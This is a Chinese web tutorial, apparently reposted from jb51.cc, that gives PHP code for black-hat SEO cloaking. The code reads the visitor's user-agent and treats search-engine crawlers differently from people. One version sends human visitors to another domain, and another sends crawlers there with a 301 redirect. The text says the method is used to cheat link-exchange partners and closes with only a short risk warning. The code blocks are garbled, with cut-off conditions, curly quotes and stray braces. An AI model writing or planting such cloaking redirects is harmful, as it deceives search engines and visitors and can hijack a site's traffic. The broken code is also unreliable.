微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

根据user-agent判断蜘蛛代码黑帽跳转代码(js版与php版本)

黑帽SEO手段中有一个大家都在用的技巧,在服务端判断 客户端浏览器的user-agent然后做进一步操作,

网上一直都有人在用 这个代码 先是一个js代码 判断网站访客来路 如果是搜索引擎来的 就跳转 如果是直接访问则不变化 这段代码是从网上找来的 已经很久了 感谢原作者

rush:js;">

如果是搜索引擎的user-agent则301跳转 目前网上好多欺骗友情链接的就是这个做法(代码会放在最后)

具体还有很多思路,跳转了,乔页等 今天仅把代码放出来 PHP代码

声明 代码都是百度下来的 先写个简单的 根据PHP的 $_SERVER[‘HTTP_USER_AGENT']来进行判断

rush:PHP;"> 0){ echo '百度'; } else if(strpos($tmp,'Yahoo! Slurp') !== false){ echo '雅虎'; } else if(strpos($tmp,'msnbot') !== false){ echo 'Msn'; } else if(strpos($tmp,'Sosospider') !== false){ echo '搜搜'; } else if(strpos($tmp,'YodaoBot') !== false || strpos($tmp,'OutfoxBot') !== false){ echo '有道'; } else if(strpos($tmp,'Sogou web spider') !== false || strpos($tmp,'Sogou Orion spider') !== false){ echo '搜狗'; } else if(strpos($tmp,'fast-webcrawler') !== false){ echo 'Alltheweb'; } else if(strpos($tmp,'Gaisbot') !== false){ echo 'Gais'; } else if(strpos($tmp,'ia_archiver') !== false){ echo 'Alexa'; } else if(strpos($tmp,'altavista') !== false){ echo 'AltaVista'; } else if(strpos($tmp,'lycos_spider') !== false){ echo 'Lycos'; } else if(strpos($tmp,'Inktomi slurp') !== false){ echo 'Inktomi'; } ?>

第二段带跳转

rush:PHP;"> 0){ $flag = true; } else if(strpos($tmp,'Yahoo! Slurp') !== false){ $flag = true; } else if(strpos($tmp,'msnbot') !== false){ $flag = true; } else if(strpos($tmp,'Sosospider') !== false){ $flag = true; } else if(strpos($tmp,'OutfoxBot') !== false){ $flag = true; } else if(strpos($tmp,'Sogou Orion spider') !== false){ $flag = true; } else if(strpos($tmp,'fast-webcrawler') !== false){ $flag = true; } else if(strpos($tmp,'Gaisbot') !== false){ $flag = true; } else if(strpos($tmp,'ia_archiver') !== false){ $flag = true; } else if(strpos($tmp,'altavista') !== false){ $flag = true; } else if(strpos($tmp,'lycos_spider') !== false){ $flag = true; } else if(strpos($tmp,'Inktomi slurp') !== false){ $flag = true; } if($flag == false){ header("Location: //www.jb51.cc" . $_SERVER['REQUEST_URI']); // 自动转到//www.jb51.cc 对应的网页 // $_SERVER['REQUEST_URI'] 为域名后面的路径 // 或 换成 header("Location: //www.jb51.cc/abc/d.PHP"); exit(); } ?>

第三段代码 是 判断后301跳转

rush:PHP;"> if (preg_match(“#(google|slurp@inktomi|yahoo! slurp|msnbot)#si”,$_SERVER['HTTP_USER_AGENT'])) {

header(“HTTP/1.1 301 Moved Permanently”);
header(“Location: http://www.saoyu.com/”);
exit;

}}

黑帽手段有风险 请慎用。如果中招的朋友感觉找后门。

原文地址:https://www.jb51.cc/js/52384.html

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐